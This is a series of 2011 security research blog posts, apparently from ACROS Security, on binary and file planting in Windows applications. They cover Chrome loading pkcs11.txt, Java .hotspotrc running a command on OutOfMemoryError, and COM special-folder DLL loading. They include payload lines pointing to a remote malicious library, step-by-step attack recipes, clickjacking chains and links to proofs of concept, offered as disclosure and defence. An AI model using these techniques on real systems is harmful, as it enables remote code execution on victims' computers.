Thursday, October 20, 2011

Google Chrome pkcs11.txt File Planting

A Vuln, Or Not A Vuln, That Is The Question

[Update 10/27/2011: Chrome 15, released two days ago, makes this bug even harder to exploit as its phishing and malware protection (enabled by default in Chrome's Under the Hood options) now sends an HTTPS request to one of its servers immediately upon startup. Therefore, in addition to not having Google as the search engine and not having visited any HTTPS addresses before the attack, the user would also have to disable phishing and malware protection in order for this bug to be exploitable.]

Thirty days ago our company notified Google about a peculiar behavior of Chrome browser that can be exploited for execution of remote code outside Chrome sandbox under specific conditions. It is another case of file planting, where an application loads a data file (as opposed to binary file, leading to binary planting) from the current working directory. Similarly to our previously reported file planting in Java Runtime Environment (still there in current build 1.6.0_29 if you want to play with it), Chrome loads a data file, namely pkcs11.txt, from the root of the current working directory and in case the file exists, parses and processes its content. Security-wise, the most interesting value in a pkcs11.txt file is called library. Consider the following line in pkcs11.txt:

library=c:\temp\malicious.dll

This line will instruct Chrome to load library c:\temp\malicious.dll. To allow remote code execution attacks, it works with remote shared folders too; in our demonstration, the following line is used:

library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib

In addition, the library file doesn't have to have a known extension (such as ".dll"), which makes it harder to block it on a firewall.

Finally, Chrome sandbox doesn't provide any protection here as the entire process of loading pkcs11.txt and the associated library is done by the parent chrome.exe process. 


HTTPS, NSS And pkcs11.txt

Chrome loads "/pkcs11.txt" the first time it needs to do anything encryption-related, which in most cases means visiting an HTTPS URL. Chrome developers tracked this issue to one of Mozilla's Network Security Services (NSS) libraries, and it seems that it is a matter of unfortunate circumstances that gave life to this bug in Chrome, although the same bug may potentially exist in some other products integrating NSS libraries.


Exploit Conditions

If you carefully read the previous paragraph, you noticed two things: 

  1. Chrome loads pkcs11.txt the first time it needs PKCS #11 capabilities, and it never does it again until re-launched. This means that if the user has already visited an HTTPS address before, or any of the sites he visited has loaded an image or any other data via HTTPS, the attack opportunity is gone. What makes things worse for the attacker is the fact that when Google is the selected search engine - and it is by default -, Chrome sends a request to https://www.google.com/searchdomaincheck... to determine your local Google domain immediately upon startup. This triggers the loading of pkcs11.txt from the root of user's local system drive and closes the attacker's window of opportunity before it was ever really opened.
  2. The initial forward slash in the file name "/pkcs11.txt" means that pkcs11.txt will be loaded from the root of the current working directory, and not from the current working directory. For instance, if current working directory is C:\users\james\, Chrome will try to load C:\pkcs11.txt. In a shared folder case, if current working directory is \\server\share\somefolder\, Chrome will try to load \\server\share\pkcs11.txt.


So how can this vulnerability be exploited? Three conditions need to be met:

  1. Google must not be the selected search engine. This setting is configurable under the Options page, and users can set Yahoo, Bing, or any other search provider as their selected search engine. We confirmed that Yahoo and Bing don't send any HTTPS requests when Chrome is launched and are therefore suitable for mounting the attack.
  2. User must not have visited any HTTPS resources before the attack. As described above, the attack relies on the fact that the NSS capabilities have not been initialized yet in the running parent Chrome process. Ideally for the attacker, the user would have just launched Chrome and not visit any web sites that send HTTPS requests.
  3. Chrome's current working directory must be set to attacker-controlled location. Since Chrome sets its current working directory to its own folder on user's machine upon startup, double-clicking on HTML file in a remote shared folder (which often works for binary planting attacks) wouldn't achieve anything for the attacker. The best remaining way we know of to set the current working directory in Chrome are then the file browse dialogs. If the attacker could get the user to try to load a file from her network shared folder, and trigger the first HTTPS request while the user had this folder opened in the "Open" dialog, Chrome would load pkcs11.txt from the root of attacker's network share and load the library specified in it.

On-Line Demonstration

We have prepared an on-line demonstration at http://www.binaryplanting.com/demo/chrome_pkcs11Planting/. Simply open this page with Chrome and follow instructions. If you don't have Chrome handy and want to see what would happen if you did, here's a video of this demonstration:



Attack Improvements And Variations

Our demonstration requires you to wait until the count-down reaches 0 before the attack is completed and the remote DLL is loaded. The reason for this waiting is to make sure the "Open" dialog has successfully loaded the remote shared folder - which can take anywhere from 5 to 30 seconds according to our tests. A real attack would not keep you waiting: the attacker-controlled server could detect the incoming requests (SMB or WebDAV) indicating that Chrome's current working directory has been set to its network share and then instruct the web page already loaded in Chrome to make some HTTPS request - which would result in Chrome loading pkcs11.txt from attacker's network share just like in our demonstration.

Current working directory can also be set via the "Save As..." dialog and any other file browse dialog the attacker feels her victim would most likely be duped into opening.

A bizarre local variant of this same exploit is also possible in the extremely unlikely case that the user has his Downloads folder in the root of any one of his local drives. In that case, all the attacker would have to do is get a malicious pkcs11.txt downloaded in user's Chrome (which can happen in a drive-by fashion as .txt is not a "dangerous" extension) and wait for the user to open the "Save As..." dialog, which by default opens the Downloads folder's location.


So, Is This A Vulnerability Or Not?

Google decided that this was not a vulnerability, but rather a "strange behavior that [they] should consider changing". The reason they provided was that "the social engineering level involved here is significantly higher than 'Your computer is infected with a virus, download this free anti-virus software and run the exe file to fix it.'"

This is actually hard to dispute. From attacker's perspective, given these two attack options, she would probably be more successful with the "fake anti-virus" one than the "file planting" one. However, the "fake anti-virus" option may not work against corporate users whose firewalls are likely to prevent them from downloading an executable, and who may not be technically allowed (e.g., with AppLocker) to launch unauthorized executables. Additionally, employees who attended at least one security awareness session could be more suspicious about a "please download and execute this" than an "open a file from this folder" request. Then again, they may not be, who knows.

Regardless, as security researchers we consider any "feature" that allows silent downloading of remote code and its execution on user's computer without warnings a vulnerability. Clearly the same criteria cannot apply to Joe Average and someone working at a nuclear power plant, and it's not a big deal if Google doesn't share our vulnerability criteria (security experts disagree on many things all the time), but Google's reasoning opens up an interesting and important question: how much social engineering is too much?

Microsoft's Security Intelligence Report Volume 11 reveals (based on Microsoft's data) that 88% of attacks in the first half of 2011 were depending on what they call "user interaction" and "feature abuse", both of which are part of what is generally considered "social engineering," i.e., getting users to do something they otherwise wouldn't. While this doesn't answer the above question, it sheds some light on how prevalent, and successful, social engineering seems to be in the real attacks out there. It seems plausible that as technical security countermeasures block more and more attack paths, attackers will be looking for the remaining paths of least resistance: both technical resistance and social one.


What Can We Learn?


  1. Loading data files from untrusted locations can be dangerous, and this includes current working directory. Action item: fire up Process Monitor while testing your applications and see what they're loading.
  2. 3rd party libraries can introduce vulnerabilities into your software, and possibly only into your software. Action item: use 3rd party libraries whose developers are quick in fixing or at least which you can patch yourself. (The NSS library with this particular bug fortunately has both of these properties.)
  3. What is a vulnerability to some, can be just strange behavior to others, and there's no industry criteria for telling who's right. (Although we can probably agree that the actual attacker is always right.) Action item for the issue described in this post: Make sure your Chrome home page is an HTTPS address or loads at least one HTTPS resource, and you won't have to care who's right.


(This fine piece of security analysis has been done by Luka Treiber, security researcher at ACROS Security. Follow us on Twitter and stay updated on our future research.)

Monday, September 26, 2011

More Misconceptions About Binary Planting

Last year, soon after revealing our binary planting research project, we published a blog post clearing up five frequently-appearing misconceptions at that time. Over a year (and about a hundred publicly fixed binary planting bugs in all sorts of software products) later, we're noticing a different set of misconceptions in public forums and on mailing lists. While we made our best effort to present binary planting in as comprehensible and clear way as we could, we accept responsibility for our undoubtedly imperfect rendition and hope this post will help interested readers to better understand our arguments.


Misconception #6: "This is a local attack."

We still occasionally come across this misconception that in a binary planting attack, the user has to willfully download a DLL or EXE and place it in some particular location on his computer, from where it will subsequently be launched. If this were true, binary planting would certainly be a ridiculous concept.

Actually though, in a typical binary planting attack the user doesn't have to download anything to his computer. He opens a file from a remote (attacker-controlled) shared folder and the vulnerable application on his computer automatically, silently executes a DLL or EXE from that same remote folder. Moreover, advanced attacks don't even require the user to do anything more than, for example, visiting a web page and clicking on two links - now who isn't doing that on a daily basis?


Misconception #7: "It doesn't work remotely on a default Windows machine."

We've heard objections that perimeter firewalls in typical networks won't allow internal Windows computers to access shared folders on an Internet-based server due to their default blocking of outbound SMB connections.

Windows 2003 Server introduced a Web Client service, which is an automatic WebDAV redirector for Windows networking connections. In short, this service makes it possible for Windows users to connect to remote network shared folders via the HTTP protocol, and this happens automatically when such connections via the SMB protocol fail. This means that even if a perimeter firewall blocks SMB network traffic towards the Internet, Windows will automatically try to connect to a remote shared folder via WebDAV (which is an extension of HTTP). We believe very few perimeter firewalls block outbound HTTP traffic as this would mean that internal users wouldn't be able to use their web browsers. WebDAV-only outbound blocking can be done by various firewalls, but this doesn't seem to be their default behavior in general *.

Anyone wishing to test whether their firewall allows outbound WebDAV connections can try to visit \\www.binaryplanting.com\demo with Windows Explorer on a reasonably default non-server Windows machine (with the Web Client service running or at least not disabled on a Windows 7 system).


Misconception #8: "Attacker could just as well get the user to open an executable."

We've heard this objection more than once and it goes like this: If in a typical binary planting attack scenario, the attacker has to trick the user to double-click a data file from a remote shared folder (which results in a vulnerable application loading a malicious DLL from the same folder), why couldn't the attacker simply get the user to double-click a malicious EXE with an icon of a data file?

It is entirely true that one can give an EXE an arbitrary icon and make it look exactly like any chosen data file such as Microsoft Word DOC or Adobe Reader PDF document. Furthermore, one can even disguise the way the file extension is displayed to the user using the UNICODE "right to left" trick. This makes it impossible for a user to visually distinguish an executable from a document file without manually inspecting their properties.

However, the difference comes after double-clicking the file, as long as this file is on a network share (as opposed to on a local drive): in case of a data file, the application associated with this file type gets launched and opens the data file; but in case of an executable, Windows display a security warning to the user saying that he is about to launch an executable from a network location and asking the user's permission to do so (see image below). While we have no field data on how effective such warning would be in stopping a "disguised executable" remote attack, it enables organizations to educate their users and increase their odds.




Moreover, double-clicking a file is not the only way to successfully trigger binary planting. The role of double-clicking in the attack is to set the current working directory to the location of the data file, so that the vulnerable application subsequently loads the malicious DLL from there. But the current working directory can also be set by opening the same data file by first launching the application and then using the File Open dialog to browse to the file and open it. (Very few applications don't change the current working directory this way.) Now, the file browse dialog will not show the disguised executable as it has an unsupported extension not matching the file type filter, and will not launch the disguised executable even if the user selects the "All files" filter, selects the executable and presses the "Open" button.

We hope this adequately describes the significant difference between a remote data file and a remote disguised executable in the context of a binary planting attack.


Credits

We'd like to end this post by thanking everyone contributing in public or private debates about binary planting vulnerabilities. We may not always all agree on everything, but such exchange of views, opinions and facts is exactly where new and better knowledge comes from. Thank you!


(* The amount of successfully received WebDAV requests from large and small organizations to our testing WebDAV server confirms that many perimeter firewalls are not blocking outbound WebDAV.)

Thursday, September 15, 2011

Microsoft's Binary Planting Clean-Up Mission

Slow, But Moving In The Right Direction

Since our presentation of COM server-based binary planting exploits at the Hack in the Box conference in May this year, Microsoft has introduced a number of relevant changes to Windows and Internet Explorer. To refresh our memory: in Windows, so-called "special folders" (e.g., Control Panel or My Computer) are implemented as in-process COM servers associated with unique CLSIDs and our researchers found that opening a file from an ordinary folder with name extension equal to some of these CLSIDs results in various DLLs being loaded and executed from this same folder. This has obvious security implications (details here and here) and our advanced binary planting research leveraged it to the point where it was possible to attack a user through Internet Explorer on both Windows XP and Windows 7.

Change #1: No "file://" Inside "http://"

The proof of concept we prepared was a web page that included a tiny (1 by 1 pixel) iframe hosting the content of a remote shared folder; when the user clicked anywhere on that page, he actually clicked inside the shared folder where the first click selected a file there, and the second one initiated the printing which triggered the binary planting bug.

Microsoft changed the behavior of Internet Explorer such that a web page (served via http://) can't display the content of a shared folder (served via file://) in a frame/iframe. This is good: there are probably very few cases where such mixture would be legitimately needed. And if you have a case like that, you can always put your web page in the "Trusted sites" zone.

Naturally this broke our proof of concept as we delivered it via http:// from http://www.binaryplanting.com/demo/XP_2-click/test.html. However it is not difficult to circumvent this limitation: if the main web page is loaded via file:// as well, it will be allowed to display a remote share in a frame/iframe, at least if it's coming from the same server. Therefore our proof of concept could be brought back to life simply by having it loaded via file:// from file://\\www.binaryplanting.com\demo\XP_2-click\test.html.

Change #2: No "file://" From "http://"

If you're reading this in Internet Explorer and try to click on the file:// link at the end of the last paragraph, you will probably notice that it doesn't work. This was the second change introduced to Internet Explorer, and again a good one. An obvious attack vector for the typical double-click binary planting attacks is a link on a web page that opens up Windows Explorer with attacker's remote shared folder. Since most users would not be able to distinguish between the displayed "malicious" folder and a shared folder in their internal network, they could easily open a document in it - and get their computer owned.
Not allowing a web page loaded via http:// to open a file:// URL blocks this attack vector and this is good. Since other leading web browsers don't launch file:// URLs in Windows Explorer, the attacker is now left with secondary attack vectors such as e-mail, various documents and instant messages. (Unless he finds a way to circumvent this new IE barrier.)

Change #3: Away With deskpan.dll On Windows XP

The September Windows update MS11-071 introduced a number of changes, but the one most relevant to this post is the removal of a non-functional COM server on Windows XP registered with a non-existing DLL called deskpan.dll, which was used in our proof of concept. Esteemed paranoid readers of our blog have manually removed this COM server 100+ days earlier when we recommended it in May (see "How to protect yourself" section). We welcome Microsoft's move to fix this exploitable configuration error as part of a security update.

However...

As we already hinted before, we found that many well-registered COM servers on all Windows versions, having specified their DLL with an absolute path, load additional DLLs with a relative path, and many of these DLLs do not exist. This provides extensive binary planting potential to a great number of flawed LoadLibrary calls that could previously be considered non-exploitable.

For instance, an attacker - having had the deskpan.dll COM server taken away from him - can migrate  his Windows XP exploit to the COM server with CLSID {32714800-2E5F-11d0-8B85-00AA0044F941}. This COM server loads C:\Program Files\Outlook Express\wabfind.dll (which exists) but then this DLL tries to load wab32res.dll without a full path. While wab32res.dll does exist in C:\Program Files\Common Files\System\, this folder comes after the current working directory in the search order - allowing a fake wab32res.dll to be loaded and executed from the attacker's "special" folder.

Furthermore, our research found that there are at least ten additional vulnerable COM servers on a default Windows XP installation.

Finally, the COM server-based binary planting vulnerability we described on Windows 7 has not been fixed yet. The "AnalogCable Class" COM server, registered with CLSID {2E095DD0-AF56-47E4-A099-EAC038DECC24}, still loads and executes ehTrace.dll from attacker's folder.

Conclusion

Microsoft is clearly putting an effort into removing binary planting bugs from their code and introducing mitigations that help block various binary planting attack vectors. While we know there's still a lot of cleaning up to do in their binary planting closet, our research-oriented minds remain challenged to find new ways of exploiting these critical bugs and bypassing new and old countermeasures. In the end, it was our research that got the ball rolling and it would be a missed opportunity for everyone's security if we didn't leverage the current momentum and keep researching.

Stay tuned - follow our research on Twitter.

Friday, July 8, 2011

Binary Planting Goes "Any File Type"

File Planting: A Sample From Our Security Research


It's been almost a year since we revealed our Binary Planting research project which identified 520+ remote execution vulnerabilities in almost all Windows applications. During this period, hundreds of binary planting vulnerabilities have been publicly reported and some have actually been fixed.

While some in the security community still seem to have a hard time understanding that binary planting doesn't only affect the loading of libraries but also stand-alone executables, we went further and "extended" the problem to all file types. This blog post reveals an interesting sample from our current research on what we call File Planting.


Java Hotspot VM Configuration Files

The current Oracle's Java Runtime Environment (version 6, update 26) - just like its previous versions - supports so-called Hotspot configuration files .hotspotrc and .hotspot_compiler. These files are loaded when Java virtual machine is initialized and can specify (or override) the VM settings that are usually provided as command-line parameters for java.exe or exclude chosen methods from compilation, respectively.

Now this would be just fine... if JRE didn't try to load these configuration files from - you guessed it - the current working directory. So if the current working directory (which we now all know can point to various locations, including a remote share on attacker's server) contains these configuration files, they will be loaded and will influence the way Java virtual machine behaves.

We focused our analysis on the .hotspotrc file since fiddling with VM settings seemed more promising from the security point of view. And indeed, we quickly located a VM setting that can be exploited for launching arbitrary executable: OnOutOfMemoryError. This setting allows one to specify user-defined commands that get ran in case JRE runs out of memory, or more specifically when the OutOfMemoryError error is thrown for the first time. Therefore:


OnOutOfMemoryError="malicious.exe"

 plus

Java code that exhausts all available memory

 equals

launching of malicious.exe.


Now, how does one set the current working directory for JRE to an attacker-controlled location? Normally, when Java applications are launched either manually or as a service, this is rather difficult if possible at all: in the former case, the current working directory is set to the location of user's command-line window and in the latter case, the current working directory is inherited from the parent process and can not be influenced by a low-privileged - much less remote - attacker.

The game changes, as it often does, in web browsers. All major web browsers support Java, and can load and execute a remote Java applet inside a web page.


Exploiting The Bug

For this experiment we need four files, which you can find neatly packed on our web page:

  1. .hotspotrc : a Java configuration file with a single line OnOutOfMemoryError="malicious.exe"
  2. Test.class : a Java applet that consumes all available memory (ours simply concatenates a string to itself many many times)
  3. Test.html :  an HTML document that loads the applet
  4. malicious.exe : the executable to get executed

Suppose the current version of Apple Safari (5.0.5) is our default web browser. If we put the above files in the same directory (on a local drive or a remote share) and double-click Test.html, what happens is the following:

  1. Safari gets launched and sets its current working directory to the location of Test.html. (Not intentionally - Windows Explorer sets the CWD this way for all launched applications.)
  2. Safari loads and renders Test.html from our directory.
  3. Test.html invokes a Java applet called Test.class, triggering the initialization of the Java virtual machine. 
  4. jvm.dll, the Java Hotspot Client virtual machine running inside the Safari process, loads .hotspotrc from our directory, parses it and employs the OnOutOfMemoryError setting found inside.
  5. jvm.dll loads the Java applet Test.class from our directory and executes it inside the Safari process, causing an OutOfMemoryError error within seconds.
  6. jvm.dll responds to the OutOfMemoryError error according to the OnOutOfMemoryError setting and launches malicious.exe from our directory using a CreateProcess call.


The attack can be mounted in the same way through Mozilla Firefox (any version), with the slight difference that Firefox actually launches an external java.exe process, which then runs malicious.exe. Furthermore, this attack can also be mounted through Internet Explorer or Google Chrome, although these set their current working directory to some safe location, meaning extra work for the attacker. (More on this some other time.)

Similarly to binary planting attacks, this file planting attack can also be mounted from a remote share, even from a WebDAV share on an Internet server. Since the malicious executable is launched with CreateProcess, there will be no security warning due to launching a remote file.

Note that neither Safari nor Firefox, nor any other web browsers are at fault here. They merely play the role of an attack delivery vehicle, while the security error is in Oracle's code.


File Planting vs. Binary Planting

File planting has a common attribute with binary planting in that files (data files or binaries) are loaded from the current working directory, which the attacker can control and thus plant a malicious file. Two major differences between file planting an binary planting, however, are:

First, a binary planting exploit looks the same in 99% of cases. If an application is willing to load your DLL or launch your EXE, you simply plant a generic malicious DLL/EXE and it almost always works. In a file planting attack, you have to understand the context of the file, what the application does with it and how (if at all) your ability to plant the file can be leveraged to mount a decent attack.

Second, some binary planting attacks can be blocked by firewalls that don't let computers in internal networks download executables from the Internet (based on files' extensions or content), and by web browsers that block downloading of such potentially dangerous files. With file planting, there can be no predefined rule to recognize a potentially malicious data file.

There are also many other interesting, significant as well as subtle differences between the two, but let this be enough for now.


What Should Oracle Do To Fix This Bug?

JRE should stop loading its configuration files from the current working directory, at least on Windows. This may not be so easy to do as some developers and their applications likely depend on this feature and doing so might break these applications. A fairly risky compromise would be to prevent loading of configuration files from the current working directory when JRE is invoked from web browsers, which would address the scope presented here. The risk would be that some other applications may also launch or integrate JRE and may thus provide a similar attack vector. A thorough functional and security analysis of this issue is thus inevitable if Oracle wants to fix this bug properly.



(Credits for research presented here goes to my colleagues, security researchers at ACROS Security: Jure Skofic for developing the uber vulnerability detector and Simon Raner for a great analysis of this vulnerability.)

Thursday, June 2, 2011

COM Server-Based Binary Planting Proof Of Concept

[Update September 19, 2011: Windows update MS11-071 breaks this proof of concept by removing the deskpan.dll registry reference. It thus no longer works but can still be used as a learning reference.]

For educational purposes we decided to publish a proof of concept (PoC) for the COM Server-Based Binary Planting attacks described in our previous post. We prepared both online and offline versions for 32-bit Windows XP running Internet Explorer 8.

Online Proof of Concept

Visit \\www.binaryplanting.com\demo\XP_2-click\test.html (with Internet Explorer) and follow instructions. You must have WebDAV communication with the Internet enabled and must not have the CWDIllegalInDllSearch hotfix installed.

Offline Proof of Concept

Download a ZIP archive of the PoC here, extract it and follow the instructions in readme.txt. You can test the PoC either from a local network share or locally on a single Windows XP machine.


Conditions And Potential Weaponization


Note that this is a proof of concept only, not a weaponized exploit. The reliability thus depends on a few factors:

  1. You have to be running Internet Explorer 8 on 32-bit Windows XP (although it probably works on IE 7 too). A weaponized exploit could automatically detect user's Windows and IE version and provide an exploit for 32-bit and 64-bit XP, Vista or Windows 7 accordingly. 
  2. You have to have "Show common tasks in folders" selected under the "Folder options" in Windows Explorer. (This is the default setting.) A weaponized exploit could use various attack vectors for different user configurations.
  3. The automatic COM Server launching process in relation with special folders is largely undocumented and can be unpredictable. A weaponized exploit could initiate various special folders-related activities for further improving the reliability.
  4. The SMB-to-WebDAV fallback takes a while (usually 10-15 seconds in our tests) and our PoC requires you to wait. A weaponized exploit could initiate this communication in the background while the user was reading an interesting text from the web page.

You're welcome to follow our research on Twitter.

Tuesday, May 24, 2011

The Anatomy of COM Server-Based Binary Planting Exploits

[May 6, 2011 update: we published a proof of concept for this vulnerability.]

Last week at the Hack In The Box conference in Amsterdam we presented some techniques for advanced exploitation of binary planting bugs. The stage was set by our previous blog post where we described how unsafely registered COM server DLLs, as well as safely registered COM server DLLs that make unsafe binary loading calls, could be abused for mounting binary planting attacks. This post reveals our work to the rest of the world.


The Magic Of Special Folders

One of the elements we used in our exploits were Windows special folders. Special folders are folders that can be shown by Windows Explorer but don't always behave like ordinary folders, which simply contain files and other folders. Some examples of special folders are Control Panel, My Computer, My Documents, Administrative Tools and Printers. Every one of these special folders is implemented as an in-process COM server with a specific class identifier (CLSID). For instance, the CLSID of My Computer is {20D04FE0-3AEA-1069-A2D8-08002B30309D}.

Let's begin with a small magic trick (works on XP, Vista and Windows 7): Create a new empty folder anywhere on your file system and rename it to folder.{20D04FE0-3AEA-1069-A2D8-08002B30309D}. (Note that the CLSID must be the extension of the folder name, i.e., must come after the final dot.) Immediately after renaming, the folder's icon will be changed to the icon of My Computer and, moreover, opening the folder will actually show the My Computer content.

Apart from having an obvious entertaining value, this trick also plays an important role in our exploits. Many applications, when processing files from special folders, or display the content of special folders, trigger the instantiation of such folders' COM servers based on the CLSIDs in their extensions. Which brings us to the first exploit.


Double-Click Attack 1: Wordpad on Windows XP

As already mentioned in our stage-setting blog post, all Windows XP installations have a registered COM server called "Display Panning CPL Extension" with CLSID {42071714-76d4-11d1-8b24-00a0c9068ff3}, implemented by a non-existing deskpan.dll. Consequently, if some application decided to instantiate such COM server, this would result in loading deskpan.dll from the current working directory. As you might have guessed, the special folders magic can make an application instantiate just any registered COM server. Let's do this with Wordpad.

The video below shows the following procedure:

  1. create a "malicious" deskpan.dll;
  2. create a new folder and rename it to files.{42071714-76d4-11d1-8b24-00a0c9068ff3} - note that Windows XP hide the folder extension, and that this special folder still behaves like an ordinary folder;
  3. copy the malicious deskpan.dll to the new folder;
  4. open the folder;
  5. create a new rich text document in the folder;
  6. double-click the rich-text document.




After double-clicking the rich text document, Wordpad gets launched and its current working directory gets set to the special folder (which is the expected behavior). However, for reasons unknown to us, Wordpad then triggers a call to the COM server-instantiating function CoCreateInstance with the CLSID of our special folder. This causes a registry lookup for the COM server DLL (deskpan.dll), and then an attempt to load this DLL using a LoadLibrary call. Failing to find this DLL in Wordpad home directory as well as in all Windows system folders, the "malicious" deskpan.dll is finally loaded from our special folder and executed.


Double-Click Attack 2: Applications on Windows 7

In contrast to Windows XP, a fresh installation of Windows 7 has no unsafely registered in-process COM servers. It does, however, have several safely registered COM servers whose DLLs make unsafe library loading calls. (XP and Vista have such DLLs too.)

One such case on Windows 7 is the COM server called "AnalogCable Class", registered with CLSID {2E095DD0-AF56-47E4-A099-EAC038DECC24} and having C:\Windows\System32\PsisDecd.dll as its DLL. When an application instantiates this COM server, the PsisDecd.dll is loaded from the System32 folder (which is okay), but this DLL quickly makes a call to LoadLibrary("ehTrace.dll"). Now it's not that ehTrace.dll doesn't exist on Windows 7: it does exist in folder C:\Windows\ehome - but applications launched outside this folder are unable to find it. This means that applications from folder C:\Windows\ehome, for instance ehshell.exe, can safely and successfully instantiate the said COM server, while other applications automatically become vulnerable if they try to do the same.

The video shows the following procedure:

  1. create a "malicious" ehTrace.dll;
  2. create a new Microsoft Word 2010 document;
  3. create a new Microsoft PowerPoint 2010 document;
  4. create a new text document;
  5. create a new PDF document;
  6. create a new folder and rename it to files.{2E095DD0-AF56-47E4-A099-EAC038DECC24} - note that Windows 7 also hide the folder extension, and that this special folder still behaves like an ordinary folder;
  7. copy all four data files and the "malicious" DLL to the new folder;
  8. open the folder;
  9. double-click the Word document; (causing Word 2010 to execute the "malicious" ehTrace.dll)
  10. double-click the PowerPoint document; (causing PowerPoint 2010 to execute the "malicious" ehTrace.dll)
  11. double-click the PDF document; (causing Nitro PDF Reader to execute the "malicious" ehTrace.dll)
  12. double-click the text document; (launching Notepad but not immediately executing the "malicious" DLL)
  13. selecting "File -> Save As" from the menu in Notepad. (causing Notepad to execute the "malicious" ehTrace.dll)




Similarly to the Wordpad exploit on Windows XP, the above exploits are based on the curious and heavily undocumented nature of special folders, which makes otherwise innocent applications instantiate chosen COM servers. Thus Word, PowerPoint and Nitro PDF Reader (and many other applications) all try to instantiate the "AnalogCable Class" COM server while having their current working directory set to our special folder. This results in a search for ehTrace.dll, and in the loading of "malicious" ehTrace.dll from our special folder. The final target, Notepad, does not get hacked simply by opening a file - but does execute the "malicious" DLL when the "Save As" dialog is opened. Apparently Notepad does not automatically trigger the COM server instantiation when a document is loaded, but opening the "Save As" dialog causes the code behind this dialog to interact with the special folder, thus instantiating the appropriate COM server.


Leveraging COM Server Exploits Through Web Browsers

Skeptics among you may say that, okay, this opens up new attack vectors for various binary planting vulnerabilities, but the user would still have to double-click a document on a remote share. And users wouldn't do that, would they? (Of course they would but let's pretend they wouldn't.) So in order to satisfy the most demanding among you, we leveraged the above exploits through web browsers, resulting in some pretty user-friendly scenarios, in a manner of speaking. Let's start with Windows XP and Internet Explorer 8.



Web Attack 1: Internet Explorer 8 on Windows XP


The following video shows how a user would experience the attack. Visiting a malicious web site, clicking once on one link, and again on another, is enough to get a remote binary executed on his computer.





Two tricks are employed in the background of this attack. The first is aimed at launching applications without double-clicking. One of the methods we found for this makes use of the default Windows XP Task View, i.e., the task list shown in Windows Explorer on the left of each folder view. When a printable document is selected in the folder, this task list includes the "Print this file" link which, when (single-) clicked upon, launches the application associated with the file type of the selected file and instructs it to initiate the printing process. The procedure is thus: 1) click the file in a remote special folder to select it, and 2) click "Print to file" to launch the application which then loads a malicious DLL.

The second trick is clickjacking. This old trick is simply used for hiding the actual attack inside a 1x1 iframe such that wherever the user clicks on the web page the first time (anywhere on the page, not only on links), he actually clicks inside this tiny iframe - precisely on the Wordpad document shown in a remote shared folder, thereby selecting this document. The iframe then repositions its remote content such that when the user clicks again, he actually clicks on the "Print this file" link in the same remote shared folder as before, thereby launching Wordpad and executing the malicious DLL inside it. Now, since most attackers want to hide their attacks as much as possible, we made the demo such that when the user clicks inside the tiny iframe, we detect that and simulate the click on the underlying web page as well, which is why the links apparently clicked on actually respond to the clicks.

For those of you preferring the schematic diagrams, here's how it works in the language of objects, arrows and annotations (taken from our Hack In The Box slides).




Web Attack 2: Internet Explorer 9 on Windows 7 With Protected Mode


We've already seen that applications can be made vulnerable through unsafe COM servers on Windows 7 just like on Windows XP. But there are two additional challenges here. First, Windows 7 don't have the task view like Windows XP do, so another way to avoid double-clicking had to be found. And second, you can't just launch any application from IE when in protected mode without popping up the yellow security warning.

For the first challenge we chose to reveal a "right-click, send to compressed (zipped) folder" trick. IE allows the user to right-click a folder inside a remote shared folder (without a warning), and then select "send to" and "compressed (zipped) folder" from the context menu. This triggers a process of compression, which sets the current working directory of IE to the remote shared folder - and completes the first part of the attack.

The second challenge was overcome with the help of verclsid.exe. This curious little executable, mostly unknown to users, gets frequently launched in the background and quickly terminates without any visible effect. Verclsid.exe is, ironically, a security measure introduced by a Windows security update associated with bulletin MS06-015, but to us it is interesting because it is "whitelisted" for the IE protected mode: when IE launches a new verclsid.exe process, the user doesn't have to okay a security warning. Furthermore, verclsid.exe instantiates the COM server associated with the extension of a chosen special folder, providing just the binary planting opportunity we need. In our attack, we trigger the launching of verclsid.exe by loading a number of different special folders in an additional 1x1 iframe while IE has its current working directory set to our remote shared folder. Since verclsid.exe is launched by IE, it also inherits IE's current working directory (which hosts our "malicious" DLL) and eventually loads our DLL. The attack is again hidden with clickjacking.

Let's see how the user experiences this attack. Visiting a malicious web site, right-clicking anywhere on the page and selecting  "send to" and "compressed (zipped) folder" from the context menu is enough to get a remote binary executed on his computer.





Again, the schematic diagram of the attack:







Lessons Learned

The main takeaway from our presentation was that binary planting, as a conceptual problem with loading binaries on Windows, is not at all a trivial problem if you really understand the numerous details and hidden processes that affect and enable it.

By shedding light on a few previously unknown attack vectors we only revealed a small portion of our advanced binary planting research, which is aimed at improving the exploitation of various binary planting vulnerabilities. If we want to convince developers to fix security defects, we need to show them that they're easy to exploit, and we hope to see some proactive effort as a result of our work. And this is by no means aimed towards Microsoft alone; it was simply easiest for us to use the components that come with Windows, but we found a large number of other vendors' product to be exploitable in the ways described above.


How To Protect Yourself?

Apart from our generic recommendations for administrators, a couple of additional temporary measures will protect you from the attacks described in this post (but unfortunately not from numerous similar attacks):


  1. On Windows XP, delete the {42071714-76d4-11d1-8b24-00a0c9068ff3} registry key under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID.
  2. On Windows 7, copy ehTrace.dll from C:\Windows\ehome to the System32 folder.

What's next?

We'll continue to raise awareness of this vulnerability class we call binary planting. There's a lot of misunderstanding about it among developers as well as security researchers, and we'll do our best to change that. Our first humble milestone is to stop seeing new product versions making unsafe LoadLibrary calls. Unfortunately, we don't seem to be anywhere close to that.


(Again, most of the above research has been done by Luka Treiber, security researcher at ACROS Security.)

Tuesday, May 10, 2011

"Binary Planting" vs. "DLL Hijacking" vs. "Insecure Library Loading"

Binary Planting's Multiple Identities

When a new thing occurs or is invented, or when a previously obscure thing becomes popular, a need emerges to give it a name so we can talk and write about it. It was no different with binary planting, DLL hijacking, DLL preloading, insecure library loading, DLL load hijacking and DLL spoofing. Except that, unfortunately, these different names all describe essentially the same thing - an attack* against a Windows application where this application loads a malicious executable instead of some intended legitimate one. We get asked a lot why we choose to use the term binary planting, so here's our reasoning.

One major reason for us to dislike words "DLL" or "library" in the name is that this problem affects not only dynamic-link libraries but also other types of executables. Furthermore, "DLL" sounds as if the insecurely loaded library always has a ".dll" extension - which is not the case, as our research has found applications trying to load libraries with extensions ".ocx", ".nls", ".tbp" and many other funny extensions. We chose to use the noun binary, which covers all types of executables involved in these vulnerabilities. So why not simply use executable? Executable is too long a word and would probably quickly be shortened to "EXE," causing a similar misunderstanding we already have with "DLL."

As for other shortcomings of the alternative terms:


